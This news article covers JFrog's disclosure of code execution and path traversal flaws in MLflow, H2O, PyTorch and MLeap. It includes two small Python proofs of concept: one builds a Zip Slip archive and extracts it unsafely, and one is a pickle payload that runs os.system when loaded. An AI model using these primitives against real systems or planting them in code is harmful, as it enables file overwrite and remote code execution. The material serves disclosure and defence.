Cybersecurity researchers have identified a series of security flaws affecting popular open-source machine learning (ML) platforms, including MLflow, H2O, PyTorch, and MLeap. These vulnerabilities could enable unauthorized code execution, posing significant risks to organizations that rely on these technologies.
The vulnerabilities, uncovered by JFrog, are part of a broader set of 22 security flaws recently disclosed by the supply chain security firm. While the earlier batch primarily concerned server-side weaknesses, the latest findings highlight exploitable flaws in ML clients and in libraries that handle ostensibly safe model formats such as Safetensors.
“Compromising an ML client within an organization grants adversaries the capacity for profound lateral movement, enabling them to infiltrate critical systems,” JFrog stated. “Such clients typically possess access to essential ML infrastructures, including Model Registries and MLOps Pipelines.”
Such access could also expose sensitive credentials associated with model registries, allowing malicious actors to embed backdoors in stored ML models or execute malicious code.
Key Vulnerabilities Highlighted:
- CVE-2024-27132 (CVSS score: 7.2): A sanitization flaw in MLflow allows a cross-site scripting (XSS) attack when an untrusted recipe is run within a Jupyter Notebook, which could ultimately lead to client-side remote code execution (RCE).
- CVE-2024-6960 (CVSS score: 7.5): Unsafe deserialization within H2O when loading untrusted ML models, potentially resulting in RCE.
- TorchScript Path Traversal in PyTorch: A vulnerability in the TorchScript feature permits path traversal attacks, enabling denial-of-service (DoS) or arbitrary file overwrites, such as corrupting critical system files or overwriting legitimate pickle files. (No CVE identifier has been assigned.)
- CVE-2023-5245 (CVSS score: 7.5): A path traversal issue in MLeap when loading a saved model in zipped format exposes the framework to a Zip Slip vulnerability, which could result in arbitrary file overwrites and code execution (a minimal illustration of the Zip Slip pattern follows this list).
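The Zip Slip pattern behind the MLeap issue is easy to demonstrate in isolation. The following minimal Python sketch is not MLeap's or PyTorch's actual code; it simply shows how an archive entry containing "../" escapes the extraction directory when entry names are joined to the target path unchecked, and how resolving and validating each path blocks the traversal.

```python
# Generic Zip Slip illustration; not MLeap or PyTorch internals.
import os
import zipfile


def build_malicious_zip(zip_path: str) -> None:
    """Craft an archive whose entry name points outside the extraction dir."""
    with zipfile.ZipFile(zip_path, "w") as zf:
        zf.writestr("../../outside.txt", "attacker-controlled content")


def unsafe_extract(zip_path: str, dest_dir: str) -> None:
    """Vulnerable pattern: trust entry names verbatim when building paths."""
    with zipfile.ZipFile(zip_path) as zf:
        for entry in zf.infolist():
            target = os.path.join(dest_dir, entry.filename)  # may escape dest_dir
            os.makedirs(os.path.dirname(target) or ".", exist_ok=True)
            with zf.open(entry) as src, open(target, "wb") as dst:
                dst.write(src.read())


def safe_extract(zip_path: str, dest_dir: str) -> None:
    """Defensive pattern: resolve each target and reject escaping entries."""
    dest_root = os.path.realpath(dest_dir)
    with zipfile.ZipFile(zip_path) as zf:
        for entry in zf.infolist():
            target = os.path.realpath(os.path.join(dest_root, entry.filename))
            if not target.startswith(dest_root + os.sep):
                raise ValueError(f"blocked traversal entry: {entry.filename}")
        zf.extractall(dest_root)  # Python's extractall also strips ".." components
```

In the vulnerable variant, an entry named "../../outside.txt" lands two directories above the chosen destination, which is precisely the arbitrary file overwrite primitive described in the list above.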
Cautionary Insights:
JFrog emphasizes that ML models should never be loaded blindly, even when they come in seemingly safe formats such as Safetensors, because loading an untrusted model can still result in arbitrary code execution; the sketch below illustrates the general risk of deserializing untrusted model artifacts.
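That caution is easiest to appreciate with the classic unsafe-deserialization primitive underlying findings like the H2O flaw. The sketch below is generic Python, not H2O's or any framework's actual code path: it shows that a pickle-based "model" file can execute attacker-chosen code the moment it is loaded, before any inference happens.

```python
# Generic illustration of unsafe model deserialization; not framework code.
import os
import pickle


class MaliciousPayload:
    """Stands in for a crafted 'model' artifact an attacker publishes."""

    def __reduce__(self):
        # pickle calls __reduce__ while loading, so this runs os.system()
        # the instant the artifact is deserialized.
        return (os.system, ("echo code executed during model load",))


# The attacker ships these bytes as a model file or registry entry.
crafted_model = pickle.dumps(MaliciousPayload())

# The victim merely loads the artifact; no attribute access or inference
# is needed for the payload to run.
pickle.loads(crafted_model)
```

This is why provenance checks and allow-listed model sources matter even when a repository appears trustworthy.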
“While AI and ML technologies promise unprecedented innovation, they simultaneously open avenues for adversaries to wreak havoc,” cautioned Shachar Menashe, JFrog’s VP of Security Research. “To mitigate these threats, organizations must exercise vigilance by scrutinizing the origins of their models. Loading untrusted models—even from a ‘secure’ repository—can trigger remote code execution, inflicting extensive harm across the organization.”
The findings underscore the imperative for enhanced scrutiny and robust security protocols in managing ML models and frameworks. With these vulnerabilities exposed, organizations must act decisively to fortify their defenses against potential breaches in their machine learning ecosystems.